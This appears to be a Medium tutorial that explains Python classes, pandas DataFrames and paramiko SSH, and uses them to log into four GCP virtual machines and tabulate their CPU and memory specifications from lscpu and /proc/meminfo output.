and of course ssh. SSH, short for Secure Socket Shell, practically comes installed with every Unix (Mac OS) or Linux (Ubuntu, Red Hat, Debian) system. The ssh program runs in a shell and is used to start a SSH client program that enables secure connection to a SSH server on a remote machine. The ssh command can be used to log into a remote machine, transfer files between two machines or to execute commands on a remote machine. To log into a VM, all you need is the IP address of the VM and a username and depending on how your user configuration, either a set of ssh-keys or a password. The syntax for the ssh command for the user root to log into a VM with IP ip then looks as follows: ssh root@ip In our example, for vm1 with IP 35.204.226.178 sitting on GCP this would translate into: ssh louwjlabuschagne_gmail_com@35.204.226.178 Running this command in a shell logs us into vm1 and the shell we are working in will now not be a local shell anymore, but rather, a remote shell logged into the remote VM identified by public IP 35.204.226.178. louwjlabuschagne_gmail_com@vm1:~$ Python Classes Python is an object oriented programming (OOP) language. Almost everything in Python is an object, with its properties and methods. A Class is like an object constructor, or a “blueprint” for creating objects. Classes provide a means of bundling data and functionality together. Creating a new class creates a new type of object, allowing new instances of that type to be made. A toy example is shown below where we create a Person class with 2 attributes: name and age. class Person: def __init__(self, name, age): self.name = name self.age = age p1 = Person("John", 36) print(p1.name) print(p1.age) What makes the object orientated paridigm amazing is that we only have to write a great blueprint (Class) once, then we can reuse the hard work we’ve done again and again. For our Person class above, we might want to construct a list containing many people. An example of this is shown below: people = [Person("Jane", 29), Person("John", 36), Person("Blake", 10)] As a side note, Classes in Python always start with capitals as per PEP8 convention, but I digress. We can now iterate over the people list and access the class attributes for each Person in the list. For example, if we wanted to print out the names of all the people in the list, we can do the following: for person in people: print(person.name) Isn’t that nice and modular? Using Classes to abstract away complicated logic from the end user is a critical pillar in OOP and a great mindset to adopt to write scalable, reproducible and maintainable code. If you ever see a function in Python starting and ending with two underscores ( __), like the __init__() function above, know that these functions are “special”. The __init__() function, usually called a method instead of a function just because it is a function inside a class, but that is just some nomenclature. The __init__() method is used to initialise the class and is sometimes also called the constructor method. Similarly to the “special” __init__() method in our Class, there is another “special” method __str__() which prints the friendly name of the object. The __str__() method is called by Python when you print a class using the print() function. For example say we code up: print(Person('Jane', 29)) what should print? Just the name, or the just the age, or both? The __str__() method tells Python what it should print. Pandas Ok, the theory is almost done. Just one more topic — Pandas. Pandas is a Python library for data manipulation and analysis. In particular, it offers data structures and operations for manipulating numerical tables called dataframes. Dataframes are a data scientist’s bread and butter and is most likely the most used data type (Class) in the Pandas package. For this post you need only know two things about the DataFrame Class, viz. - what is a DataFrame (just a table) and, - what does the apply()function do to a column of a DataFrame. I show an example of the Iris dataset as a DataFrame Class below. To my dismay, pandas has no built-in datasets, so I’ve consulted another imperative data science package — seaborn. Go check it out if you can. import pandas as pd import seaborn as sns iris = sns.load_dataset('iris') iris.head() So what is a DataFrame? It’s just a table — that’s it. However, it’s got some pretty cool built-in methods to make your data manipulation, interrogation and cleaning a much, much more pleasurable experience. If we run the code below, which calls the apply() method on the sepal_length column, we get the output shown in the table. I hope the functionality of the apply() method is clear from the example… If not, stare at it a bit, then read on. iris.sepal_length.apply(lambda row: 'tall' if row >= 5 else 'short') There is a weird lambda keyword thrown into the example, which in short is just a “phantom” function, formally called an anonymous function. Basically it is a function that doesn’t have a name but runs some code. In our example, this anonymous lambda function checks each row of our column, and if the sepal length is greater or equal to zero returns tall, otherwise it returns short. Bring it all together I hear you saying: “OK cool Louwrens, nice background, but so what?” Well, we’ve covered all the theory needed to understand what is about to happen, which is: - Create a VM Class which gets initialised with an IP and username, - the init method then checks if we can connect to the remote VM and uses the ✅ and ⛔️ emoticons to show a successful or unsuccessful connection. - I then create a DataFrame containing all the IPs of our 4 remote VMs on GCP, - then we can use the apply()method to run bash commands on these VMs and return a DataFrame. - I then display a summary DataFrame containing the specs for these 4 VMs sitting on GCP. Below I create the VM Class. from paramiko import SSHClient from paramiko.auth_handler import AuthenticationException class VM(object): def __init__(self, ip ,username, pkey='~/.ssh/id_rsa.pub'): self.hostname = ip self.username = username self.pkey = pkey self.logged_in_emoj = '✅' self.logged_in = True try: ssh = SSHClient() ssh.load_system_host_keys() ssh.connect(hostname=self.ip, username=self.username, key_filename=self.pkey) ssh.close() except AuthenticationException as exception: print(exception) print('Login failed'%(self.username+'@'+self.ip)) self.logged_in_emoj = '⛔️' self.logged_in = False def __str__(self): return(self.username+'@'+self.ip+' '+self.logged_in_emoj) I then create a DataFrame, VMs, which holds all the IPs for our 4 VMs on GCP. VMs = pd.DataFrame(dict(IP=['35.204.255.178', '35.204.96.40', '35.204.213.24', '35.204.115.95'])) We can then call the apply() method on the DataFrame, which iterates through each host and creates a VM Class object for each VM which gets stored in the VM column of the VMs DataFrame. VMs['VM'] = VMs.apply(lambda row: VM(row.IP, USERNAME, PUB_KEY), axis=1) Note that the __str__() method of our VM Class is used to represent the VM Class in a DataFrame, as seen below. Each VM is represented as username + ip + ✅, exactly how we defined it in the __str__() method. Ok great, we’ve created a DataFrame with a bunch of connected VMs inside. What can we do with these? For those of you who don’t know, there is a command called lscpu in Unix which displays all the information about the CPUs on a machine, below is an example output for vm1. louwjlabuschagne_gmail_com@vm1:~$: 85 Model name: Intel(R) Xeon(R) CPU @ 2.00GHz Stepping: 3 CPU MHz: 2000.170 BogoMIPS: 4000.34 Hypervisor vendor: KVM Virtualization type: full L1d cache: 32K L1i cache: 32K L2 cache: 256K L3 cache: 56320K NUMA node0 CPU(s): 0 We are now looking to get the output of the lscpu command for each of our 4 VMs on GCP; we can wrap the lcspu function in the exec_command() method (see the github repo) to return the output of each VM’s lscpu command. lscpu = VMs.VM.apply(lambda vm: exec_command(‘lscpu’)) With which we can obtain a DataFrame like the one shown below. Another useful command is the cat /proc/meminfo command, shown below, which returns the current state of the RAM for a Unix machine. louwjlabuschagne_gmail_com@my-vm1:~$ cat /proc/meminfo MemTotal: 1020416 kB MemFree: 871852 kB MemAvailable: 835736 kB Buffers: 10164 kB Cached: 53504 kB SwapCached: 0 kB Active: 92012 kB Inactive: 17816 kB Active(anon): 46308 kB Inactive(anon): 4060 kB Active(file): 45704 kB Inactive(file): 13756 kB Unevictable: 0 kB Mlocked: 0 kB SwapTotal: 0 kB SwapFree: 0 kB Dirty: 28 kB Writeback: 0 kB AnonPages: 46176 kB Mapped: 25736 kB I’ve extracted the most relevant columns from the lscpu, and cat /proc/meminfo commands and display an overview of our 4 VMs below. We can plot this information quickly with a library like seaborn or plotly that works great out of the box with DataFrame objects, or we can get summary statistics for all our VMs using the built-in methods pandas has. Conclusion This post has only scratched the surface on how using Classes and DataFrames in conjunction with each other can ease your life. Be sure to check out the jupyter notebook on the github repo to fill in some coding gaps I’ve eluded to in this post. The next time you are doing data wrangling with pandas I encourage you to take a step back and consider wrapping some of the functionality you need in a Class and seeing how that could improve your workflow. Once written, you can always reuse the Class in your subsequent analysis or productionise it with your code. As the python mindset goes: “Don’t reinvent the wheel every time.”
https://medium.com/@louwjlabuschagne/managing-vms-like-a-data-scientist-c34048c4d162?source=topic_page---------1------------------1
CC-MAIN-2019-26
refinedweb
2,193
67.18
slice numpy array using lists of indices and apply function, is it possible to vectorize (or nonvectorized way to do this)? vectorized would be ideal for large matrices import numpy as np index = [[1,3], [2,4,5]] a = np.array( [[ 3, 4, 6, 3], [ 0, 1, 2, 3], [ 4, 5, 6, 7], [ 8, 9, 10, 11], [12, 13, 14, 15], [1, 1, 4, 5]]) index np.array([[8, 10, 12, 14], [17, 19, 24, 37]]) Approach #1 : Here's an almost* vectorized approach - def sumrowsby_index(a, index): index_arr = np.concatenate(index) lens = np.array([len(i) for i in index]) cut_idx = np.concatenate(([0], lens[:-1].cumsum() )) return np.add.reduceat(a[index_arr], cut_idx) *Almost because of the step that computes lens with a loop-comprehension, but since we are simply getting the lengths and no computation is involved there, that step won't sway the timings in any big way. Sample run - In [716]: a Out[716]: array([[ 3, 4, 6, 3], [ 0, 1, 2, 3], [ 4, 5, 6, 7], [ 8, 9, 10, 11], [12, 13, 14, 15], [ 1, 1, 4, 5]]) In [717]: index Out[717]: [[1, 3], [2, 4, 5]] In [718]: sumrowsby_index(a, index) Out[718]: array([[ 8, 10, 12, 14], [17, 19, 24, 27]]) Approach #2 : We could leverage fast matrix-multiplication with numpy.dot to perform those sum-reductions, giving us another method as listed below - def sumrowsby_index_v2(a, index): lens = np.array([len(i) for i in index]) id_ar = np.zeros((len(lens), a.shape[0])) c = np.concatenate(index) r = np.repeat(np.arange(len(index)), lens) id_ar[r,c] = 1 return id_ar.dot(a)
https://codedump.io/share/6ZUMLFu99l3F/1/sum-groups-rows-of-numpy-matrix-using-list-of-lists-of-indices
CC-MAIN-2019-43
refinedweb
274
63.7
Thank you for the results NN.... ab kutch kehne kee ijaazat hai? ^ Waisay tau SARKAR abhie khush ho rahain hain, magar bol kya kahna chahta hai, Yad rahay, SARKAR jantay hain tou kahan rahta hai! :-p ffice:office" /><?xml:namespace prefix = o ns = "urn:schemas-microsoft-com Sir, aap kee khushi ham sab kee khushi hai! It is apparent from the results that you and Asad had the right strategy to work within the limits and you made it home in style with excellent showing on the time clock. Best thing is that you do not have to get any significant work done to bring the car back in the same state as before. More power to you guys and inshallah better results next year! I think the rest of the results are largely as expected (barring the DNFs), except as I pointed out earlier the 3 wild card showings by Jeep. In all my previous discussions with all pundits, Jeep had been written off and utterly dismissed as a competitor at Cholistan: primarily for being too unreliable and not being rally ready. Now, not only do we see two Wranglers (one apparently with kamanis/leaf springs) and a Grand Cherokee finishing competitively. <o:p></o:p><o:p></o:p>Nevertheless, I don’t mean to sing Jeep qaseedas here but point out my personal personal favorite entry: the silver TJ Wrangler which seems to stand 6th in overall rankings (across categories)! Hats off to the driver, Mr. Ghulam Sarwar (and the navigator ofcourse) for keeping up with the Top 5 modified monsters on what appears to be a raised, short wheelbase, manual transmission, near stock Jeep TJ. Kudos! BTW Once again many thanks to NN, Asad, Laparwah, Libra and DeadVirus for the wonderful event coverage and photography. Stealing some pics of the TJ below: <o:p></o:p> <o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p> <o:p></o:p> <o:p></o:p><o:p></o:p> Firstly, thnx Suhaib for all your kind words of encouragement for us rally participants. I was also very impressed with the Jeep performance, though Grand Cherokee was what impressed me most. I would not entirely agree with your statement that it was near stock (just because he didn't remove his rear seats?), I can see twin shocks, steering dampers and from his timing I would say he was definitely a regular entrant to these events. He does have a mighty engine, which is the most essential at Cholistan. His start time suggests he was 7th fastest in qualifying as well, so he definitely knows what he was doing!! NN, Some pics of the same jeep with previous owners from the Janj Shandur thread: You are right in that the jeep has been raised by a good 4 inches and shocks and dampers added. Probably more mods too but it still appears a fair distance from the both the Bilstein/King double shock systems seen on the Vigos and the heavy duty suspension mods that you would expect from an desert racing TJ in the US. The latter would probably be something like this with coil-over shocks on aftermarket performance 3&4 link suspension systems The Cholistan Experience 2010 Video (30min) @ @ Pinks, brilliant stuff, will need to get the cd or dvd of it from you. Have only seen first 7 minutes yet, net was downloading too slow, so I will let it buffer all before I watch in one go. Zabardast video @all Thankyou for the appreciation !! Amazing video Shehzad Bhai....very well done. hats off to your committment in shooting and editing the whole thing. Shehzad bhai.. Very impressive and inspirational indeed. Great piece of work there. Hats off. Ehsan Was in Lahore yesterday and dropped by Saidhi's place with Janj. Later on Ahsan (I believe he drove the red and black VTC Nissan) dropped by with another friend from Karachi who rides a B-Class Vigo at Cholistan. Invariably, the focus of the discussion was Rally and Cholistan and some intersting points came up. Saidhi treated us to some very interesting set of videos of his Jumpin' Jack Crash Jimny. Of note are two videos of the high jump sequence and a hilarious post crash video of him and his navigator. Waiting for upload!!! The silver TJ Wrangler was driven by Ghulam Abbas "Shar" (I may have the last name wrong but thats how they referred to the gentleman) who apparently has been participating at Cholistan since 1993 and has always driven a Jeep Wrangler. There was obviously plenty of discussion on Saidhi's newly acquired battle tested Pajero Evo. Apparently, just the night before, Saqib and Saidhi had a showdown between Janj's reacquired battered green Cherokee XJ (supposedly sporting a busted fuel pump) and Saidhi's 280HP Evo(sporting mismatched Honda Civic plugs)....before we get to the results, I must take my hat off for Saidhi for being a true sportsman! By the time me and Janj left, everyone was huddled around Saidhi's PC and reliving Cholistan 2010 through coverage on this very thread!! Once again mgany thanks and hats off to Burhan Kundi, Shehzad, Dr nnn, Desertdevil and Fihsak for all their efforts and hard work in sharing their experience with us all! Lets start planning for next year. Thumbs up Again ! Thats Me, 2nd from left;) Sk no doubt Saidhi is a true sportsman! This a good shot, but the one with your LC going through water is a better dynamic shot IMO. I love that one more. That was just my way of bumping up the thread!!! (pic was captured by someone else, and passed on to me).
https://www.pakwheels.com/forums/t/cholistan-rally-2010-experience/105309?page=8
CC-MAIN-2018-05
refinedweb
958
69.72
I have to collections: IEnumerable<lineResult> diplayedBondsList and List<string> pIsinList lineResult is a very simple class defined as: public class lineResult { public string isin { get ; set ; } public double rate { get ; set ; } public string issuer { get ; set ; } } I am trying to create a new List with the string that are in pIsinList, but only if they are not already in the field isin of a "lineResult" element of diplayedBondsList. Kind of a "left XOR" (left because only one of the two lists elements would be added without a correspondance in the other table). I am trying to not use too many loop because my lists have a very large amount of data, and I think that would slow down the program. I have written this, but it does not seem to work, newBondLines always being empty: IEnumerable<lineResult> newBondLines = diplayedBondsList.Where(item => pIsinList.IndexOf(item.isin) < 0); foreach (lineResult lr in newBondLines) { newIsinList.Add(lr.isin); } In addition, I do use a loop, and maybe I could avoid it with a nice LINQ statement. How could I 1) make this "left XOR" work and 2) improve its speed?
http://www.howtobuildsoftware.com/index.php/how-do/dnb/c-linq-ienumerable-left-xor-between-two-lists-with-linq
CC-MAIN-2019-39
refinedweb
188
62.72
CodeGuru Forums > .NET Programming > C-Sharp Programming > COM PDA Click to See Complete Forum and Search --> : COM H. Petschko June 25th, 2001, 01:55 PM I have seen several questions about this subject, yet no answer (if given at all) was satisfying to me. So here's the question again: How can I use existing COM interfaces from C#? Something to compile and run would be great. thanks very much phi angelsb June 26th, 2001, 07:26 PM Hope this helps also from the howto documentation of .net How Do I...Call COM Methods from .NET? This example demonstrates how to use COM object from a Visual Basic.NET or C# application. In order to use the types defined within a COM library from managed code, you must obtain an assembly containing definitions of the COM types. Refer to the How Do I...Build a .NET Client That Uses a COM Server? for specific details. With Visual Basic.NET or with C#, you can reference the assembly using compiler /r switch or you can add reference to the project directly from Visual Studio.NET development tool. namespace TestClient { public class Test { public static void Main(){ ExplorerLib.InternetExplorer explorer; ExplorerLib.IWebBrowserApp webBrowser; explorer = new ExplorerLib.InternetExplorer(); webBrowser = (ExplorerLib.IWebBrowserApp) explorer; webBrowser.Visible = true; webBrowser.GoHome(); ... } } } Namespace TestClient Public Class Test Public Shared Sub Main() Dim explorer As ExplorerLib.InternetExplorer Dim webBrowser As ExplorerLib.IWebBrowserApp explorer = New ExplorerLib.InternetExplorer webBrowser = explorer webBrowser.Visible = True webBrowser.GoHome ... End Sub End Class End Namespace smakadia July 13th, 2001, 10:22 AM Here is another great article on using COM components in .NET called "Consume COM Components From .NET". Please rate my post if you think it was helpful. Or you can send money! :) H. Petschko July 15th, 2001, 04:45 AM Thanks for the help. However I still have two serious problems (want to use an out-of-process server which has been tested with VB and VC++) 1) When I take a look (ildasm.exe) at the dll which has been created by tlbimp.exe, I can see that many properties, instead of returning an interface just return a System.Object as shown below. get_ActiveDocument : class System.Object Thus I have to cast and, frankly, this is not what I expected from C#... 2) Running the programm causes the following exception: An unhandled exception of type 'System.Runtime.InteropServices.VTableCallsNotSupportedException' occurred Again, the server caused no problems with VB and VC++! Thanks for help hansjoerg Padma kumar November 5th, 2001, 06:12 AM I am in need to use WebBrowser2 control in my dialog (non mfc). sisce this is possible in vb, i trust, it can also be done in VC also. I am using a WinMain SDK application. codeguru.com
http://forums.codeguru.com/archive/index.php/t-181889.html
crawl-003
refinedweb
458
52.97
<div dir="ltr">Still on the ICFPC 2007 topic<br><br>I am curious about one thing. If I read the file applying hGetContents to a ByteString (Lazy or Strict) or a String, it seems to read much faster than the version where I construct a sequence.<br> <br><br> main = do <br> (arg1:args)<-getArgs <br> hIn <- openFile arg1 ReadMode<br> c <-BL.hGetContents hIn --Really Fast<br> let dna = c<br> r<-return (process dna)<br> print (show (r))<br><br><br><br> main = do <br> (arg1:args)<-getArgs <br> hIn <- openFile arg1 ReadMode<br> c <-hGetContents hIn<br> let dna = fromList c --Kind of slow<br> r<-return (process dna)<br> print (show (r))<br><br><br>I think the "fromList" overhead will be compensated by the O(log(n)) functions on a Seq, against the O(n) counterparts on the strings.<br><br> <br>What are your considerations about using Data.Sequence?<br><br><br></div>
http://www.haskell.org/pipermail/beginners/attachments/20080725/a937c897/attachment.htm
CC-MAIN-2014-42
refinedweb
160
55.78
From: Johan Torp (johan.torp_at_[hidden]) Date: 2008-05-14 08:57:48 Anthony Williams-3 wrote: > >> Maybe there isn't even a notion of a thread crashing without >> crashing the process. > > No, there isn't. A thread "crashes" as a result of undefined behaviour, in > which case the behaviour of the entire application is undefined. > I thought Windows' SetUnhandledExceptionFilter could handle this but I was wrong. Anthony Williams-3 wrote: > >> At the very least, I see a value in not behaving worst than if the >> associated client thread would have spawned it's own worker thread. That >> is: >> std::launch_in_pool(&crashing_function); >> should not behave worse than >> std::thread t(&crashing_function); > > It doesn't: it crashes the application in both cases ;-) > You're right. Deadlocks will however be able to "spread" in this non-obvious way. Lets say thread C1 adds task T1 to the pool which is processed by worker thread W1. C1 then blocks until T1 is finished. When T1 waits on a future, it starts working on job T2 which deadlocks. This deadlock now spreads to the uninvolved thread C1 too. Don't now how much of a problem this is though - effective thread re-use might be worth more than this unexpected behaviour. Anthony Williams-3 wrote: > > If it was a large list, I wouldn't /just/ do a timed_wait on each future > in > turn. The sleep here lacks expression of intent, though. I would write a > dynamic wait_for_any like so: > > void wait_for_any(const vector<future<void>>& futures) > { > while (1) > { > for (...f in futures...) > { > for (...g in futures...) if (g.is_ready()) return; > if(f.timed_wait(1ms)) return; > } > } > } > > That way, you're never just sleeping: you're always waiting on a future. > Also, > you share the wait around, but you still check each one every time you > wake. > Maybe you would, but I doubt most users would. I wouldn't expect that waiting on a future expresses interest in the value. Anthony Williams-3 wrote: > > You're right: if there's lots of futures, then you can consume > considerable > CPU time polling them, even if you then wait/sleep. What is needed is a > mechanism to say "this future belongs to this set" and "wait for one of > the > set". > Exactly my thoughts. Wait for all would probably be needed too. And to build composites, you need to be able to add both futures and these future-sets to a future-set. Might be one class for wait_for_any and another one for wait_for_all. Anthony Williams-3 wrote: > > Currently, I can imagine doing this by spawning a separate thread for > each future in the set, which then does a blocking wait on its future and > notifies a "combined" value when done. The other threads in the set can > then > be interrupted when one is done. Of course, you need /really/ lightweight > threads to make that worthwhile, but I expect threads to become cheaper as > the > number of cores increases. > Starting a thread to wait for a future doesn't seem very suitable to me. Imagine 10% of the core threads each waiting on (combinatorial) results from the remaining 90%. Also, waiting on many futures is probably applicable even on single core processors. For instance if you have 100s of pending requests to different types of distributed services, you could model each request with a future and be interested in the first response which arrives. Windows threads today aren't particularily light-weight. This might mean that condition_variable isn't a suitable abstraction to build futures on :( At least not the way it works today. But I don't think it's a good idea to change condition_variables this late. It is a pretty widespread, well working and well understood concurrent model. OTOH changing future's waiting model this late is not good either. Anthony Williams-3 wrote: > > Alternatively, you could do it with a > completion-callback, but I'm not entirely comfortable with that. > I'm not comfortable with this either, for the reasons I expressed in my response to Gaskill's propsal. This issue is my biggest concern with the future proposal. The alternatives I've seen so far: 1. Change/alter condition variables 2. Add future-complete callback (Gaskill's proposal) 3. Implement wait_for_many with a thread per future 4. Implement wait_for_many with periodic polling with timed_waits 5. Introduce new wait_for_many mechanism (public class or implementation details) 6. Don't ever support waiting on multiple futures 7. Don't support it until next version, but make sure we don't need to alter future semantics/interface when adding it. Alternative 7 blocks the possibility to write some exciting libraries on top of futures until a new future version is available. Do you have further alternatives? Johan --
https://lists.boost.org/Archives/boost/2008/05/137366.php
CC-MAIN-2020-40
refinedweb
790
66.23
19 April 2011 22:02 [Source: ICIS news] HOUSTON (ICIS)--The local polyethylene (PE) producer in ?xml:namespace> Dow's measure was based on rising costs of feedstock ethylene in international markets and also on the general lack of alternatives for Before the proposed May increase, low density PE (LDPE) prices in Chile were in the range of $1,965-2,117/tonne DEL (delivered) based on ICIS. Prices for small-volume buyers were likely to be even higher. Product from the US Gulf would likely arrive at $1,960-1,980/tonne CFR (cost and freight) Chile main port, and product from Product from It was not clear if the proposed $100/tonne price increase would take hold partially or in full. Market players said the behaviour of ethylene prices in the coming week would make or break this initiative. (
http://www.icis.com/Articles/2011/04/19/9453954/chile-pe-prices-to-rise-100tonne-in-may-on-higher-feedstock-costs.html
CC-MAIN-2014-41
refinedweb
141
54.15
import org.netbeans.modules.j2ee.api.ejbjar.Car;22 import org.openide.filesystems.FileObject;23 24 /**25 * Provider interface for application client (car) modules.26 * <p>27 * The <code>org.netbeans.modules.j2ee.ejbapi</code> module registers an28 * implementation of this interface to global lookup which looks for the29 * project which owns a file (if any) and checks its lookup for this interface,30 * and if it finds an instance, delegates to it. Therefore it is not normally31 * necessary for a project type provider to register its own instance just to32 * define the application client (car) module for files it owns, assuming it33 * uses projects for implementation of application client (car) module.34 * </p>35 * <p> If needed a new implementation of this interface can be registered in 36 * global lookup.37 * </p>38 * @see Car#getCar39 *40 * @author Pavel Buzek41 * @author Lukas Jungmann42 */43 public interface CarProvider {44 45 /**46 * Find a carmodule containing a given file.47 * @param file a file somewhere48 * @return a carmodule, or null for no answer49 * @see CarFactory50 */51 Car findCar(FileObject file);52 53 }54 Java API By Example, From Geeks To Geeks. | Our Blog | Conditions of Use | About Us_ |
http://kickjava.com/src/org/netbeans/modules/j2ee/spi/ejbjar/CarProvider.java.htm
CC-MAIN-2017-04
refinedweb
197
52.39
Join the community to find out what other Atlassian users are discussing, debating and creating. Dear Community, I have an simple workflow there the reporter needs to fullfil an excel sheet. Ideally the transition from status A to B will send an email with this sheet as attachment to the reporter. Any ideas how to archieve? Maybe with scriptrunner? Best would be without any other plugins. Thanks in advanced. Kristian Hello @Access Microfinance Holding AG You can use Script Runner post-function on this transition called "Send custom email" there are option to include attachments added during this transition. Thanks @Mark Markov, This helps me at least for customizing the e-mail even further but where can I upload the attachement when? It seems this area is for setting rules only. Like upload .pdf´s only or to restrict the filesize. I want to archieve for example that I press the transition action and a custom email with an attachment X will be send automatically. The reporter needs to fullfil this attachment, re-upload and done. Thanks in advanced. Kristian In this case, for example, you can attach this excel to issue, and create custom callback that will attach files with given name import com.onresolve.scriptrunner.canned.jira.workflow.postfunctions.MailAttachment {MailAttachment a -> a.filename.toLowerCase().equals("exeltofill.xls")} Hi @Access Microfinance Holding AG, if I'm not wrong (and I often am) I'd say you need a custom scriptrunner email script or you could use the Email this issue add-on: JETI can send out recent attachments. Regarding the archiving: what do you mean by that? Solution without add-ons: you would have to redirect the user to your Jira issue and open up your Jira to public. Let me know if this helps somewhat and what your additional thoughts are. Cheers, Krisz Thanks for the mentioned hints. For scriptrunner itselfs it looks like the custom email function is for configuring attachement rules only or I miss the simple "upload attachement" button. :) Yes you are right, to add an attachment as a comment for example and just inform the user could be also an option. Looks like this is the way to go for me. Thanks for helping out, which I appreciate. Best, Krist.
https://community.atlassian.com/t5/Jira-questions/Jira-Workflow-Transition-Send-Attachment/qaq-p/876142?utm_campaign=subscription_search_answer&utm_content=topic&utm_medium=email&utm_source=atlcomm
CC-MAIN-2019-22
refinedweb
377
65.42
Create Apache Kafka enabled event hubs Azure Event Hubs is a Big Data streaming Platform as a Service (PaaS) that ingests millions of events per second, and provides low latency and high throughput for real-time analytics and visualization.. This article describes how to create an Event Hubs namespace and get the connection string required to connect Kafka applications to Kafka-enabled event hubs. Prerequisites If you do not have an Azure subscription, create a free account before you begin. Create a Kafka enabled Event Hubs namespace Sign in to the Azure portal, and click Create a resource at the top left of the screen. Provide a unique name and enable Kafka on the namespace. Click Create. Once the namespace is created, on the Settings tab click Shared access policies to get the connection string. You can choose the default RootManageSharedAccessKey, or add a new policy. Click the policy name and copy the connection string. Add this connection string to your Kafka application configuration. You can now stream events from your applications that use the Kafka protocol into Event Hubs. Next steps To learn more about Event Hubs, visit these links:
https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-create-kafka-enabled
CC-MAIN-2018-51
refinedweb
191
62.48
SHMCTL(2) NetBSD System Calls Manual SHMCTL(2)Powered by man-cgi (2021-06-01). Maintained for NetBSD by Kimmo Suominen. Based on man-cgi by Panagiotis Christias. NAME shmctl -- shared memory control operations LIBRARY Standard C Library (libc, -lc) SYNOPSIS #include <sys/shm.h> int shmctl(int shmid, int cmd, struct shmid_ds *buf); DESCRIPTION The shmctl() system call performs control operations on the shared memory segment specified by shmid. Each shared memory segment has a shmid_ds structure associated with it which contains the following members: struct ipc_perm shm_perm; /* operation permissions */ size_t shm_segsz; /* size of segment in bytes */ pid_t shm_lpid; /* pid of last shm op */ pid_t shm_cpid; /* pid of creator */ shmatt_t shm_nattch; /* # of current attaches */ time_t shm_atime; /* last shmat() time */ time_t shm_dtime; /* last shmdt() time */ time_t shm_ctime; /* last change by shmctl() */ The ipc_perm structure used inside the shmid shmctl() is specified in cmd and is one of: IPC_STAT Gather information about the shared memory segment and place it in the structure pointed to by buf. IPC_SET Set the value of the shm_perm.uid, shm_perm.gid and shm_perm.mode fields in the structure associated with shmid. The values are taken from the corresponding fields in the structure pointed to by buf. This operation can only be exe- cuted by the super-user, or a process that has an effective user id equal to either shm_perm.cuid or shm_perm.uid in the data structure associated with the shared memory segment. IPC_RMID Remove the shared memory segment specified by shmid and destroy the data associated with it. Only the super-user or a process with an effective uid equal to the shm_perm.cuid or shm_perm.uid values in the data structure associated with the segment can do this. SHM_LOCK Lock the shared memory segment specified by shmid in memory. This operation can only be executed by the super-user. SHM_UNLOCK Unlock the shared memory segment specified by shmid. This operation can only be executed by the super-user. The read and write permissions on a shared memory identifier are deter- mined by the shm_perm.mode field in the same way as is done with files (see chmod(2)), but the effective uid can match either the shm_perm.cuid field or the shm_perm.uid field, and the effective gid can match either shm_perm.cgid or shm_perm.gid. RETURN VALUES Upon successful completion, a value of 0 is returned. Otherwise, -1 is returned and the global variable errno is set to indicate the error. ERRORS shmctl() will fail if: [EACCES] The command is IPC_STAT and the caller has no read permission for this shared memory segment. [EFAULT] buf specifies an invalid address. [EINVAL] shmid is not a valid shared memory segment identifier. cmd is not a valid command. [ENOMEM] The cmd is equal to SHM_LOCK and there is not enough physical memory. [EPERM] cmd is equal to IPC_SET or IPC_RMID and the caller is not the super-user, nor does the effective uid match either the shm_perm.uid or shm_perm.cuid fields of the data structure associated with the shared memory seg- ment. An attempt was made to increase the value of shm_qbytes through IPC_SET but the caller is not the super-user. The cmd is equal to SHM_LOCK or SHM_UNLOCK and the caller is not the super-user. SEE ALSO ipcrm(1), ipcs(1), shmat(2), shmget(2) STANDARDS The shmctl system call conforms to X/Open System Interfaces and Headers Issue 5 (``XSH5''). HISTORY Shared memory segments appeared in the first release of AT&T System V UNIX. NetBSD 9.99 November 25, 2006 NetBSD 9.99
http://man.netbsd.org/shmctl.2
CC-MAIN-2022-05
refinedweb
594
57.77
Getting Started with Selenium and Python I thought I'd have a look at Selenium today. Here I my notes from my first outing. Selenium Selenium is a funcitonal testing framework which automates the browser to perform certain operations which in turn test the underlying actions of your code. It comes in a number of different versions: Available Components Selenium Core The core HTML and JavaScript files which you can install on your server to program Selenium directly. No-one really uses these. Selenium IDE A firefox plugin which embeds Selenium Core into Firefox so that you don't need to install it on your server. It also provides a nice GUI for recording and re-playing tests as well as exporting them as Python code (and other formats) so that they can be used with Selenium RC Selenium RC (Remote Control) This is a server which can be controlled (via HTTP as it happens) to send Seleium commands to the browser. This effectively allows you to control a browser remotely from your ordinary Python test suite. The RC server also bundles Selenium Core, and automatically loads it into the browser. Selenium Grid This allows you to run your Selenium tests on multiple different browsers in parallel. We will use Selenium IDE with Firefox and Selenium RC. Selenium IDE Now would be a great time to watch the introductory video at to understand how Selenium IDE works. It is only a minute or two long and exaplins how everything works with a demo much better than I could with words. Now you've seen the video its time to create and run your own test. Here's what you need to do: - Download and install Selenium IDE from It is a .xpi file which will be installed as a Friefox plugin. - Start the IDE by clicking Tools -> Selenium IDE from the menu. - Recording will have started automatically so perform some actions. For this first example, try searching for something in Google, follow a link and then perform some more actions on the site you arrive at. Then press the record button to stop. - Press the play all tests button to see the actions re-performed - Choose Options->Format->Python to see a Selenium RC test suite written in Python which will re-perform those actions. Save the Test Case as First Test and save the Python as first_test.py Although the Selenium IDE you've just used to record your tests only works in Firefox, the tests it produces can be used with Selenium RC to run tests in most modern JavaScript browsers. Selenium RC The Selenium RC server is written in Java even though it can be controlled from many languages. To run it you will need a recent version of Java installed. Here's how to install it on Debian/Ubuntu: sudo apt-get install openjdk-6-jdk Now download the latest version from and run these commands to install it: unzip selenium-remote-control-1.0-beta-2-dist.zip cd selenium-remote-control-1.0-beta-2 cd selenium-server-1.0-beta-2 java -jar selenium-server.jar The options for the server are documented at: If you visit you'll see some of the tests. You can run these automatically with these commnads with the server still running: cd selenium-remote-control-1.0-beta-2 cd selenium-python-client-driver-1.0-beta-2 python test_default_server.py This will take a few seconds to load some browser windows and then output the following to show that the test passed: Using selenium server at localhost:4444 . ---------------------------------------------------------------------- Ran 1 test in 18.695s OK There will be plenty of output on the Selenium RC server's console explaining what it is up to. Now try running the script you saved earlier. You'll need to copy the selenium.py file from selenium-remote-control-1.0-beta-2/selenium-python-client-driver-1.0-beta-2 into the same directory as first_test.py and then run this: python first_test.py You'll see the following error output after 3 seconds: E ====================================================================== ERROR: test_new (__main__.NewTest) ---------------------------------------------------------------------- Traceback (most recent call last): File "first_test.py", line 12, in test_new sel.open("/") File "/home/james/Desktop/GRP/code/trunk/GRP/test/selenium.py", line 764, in open self.do_command("open", [url,]) File 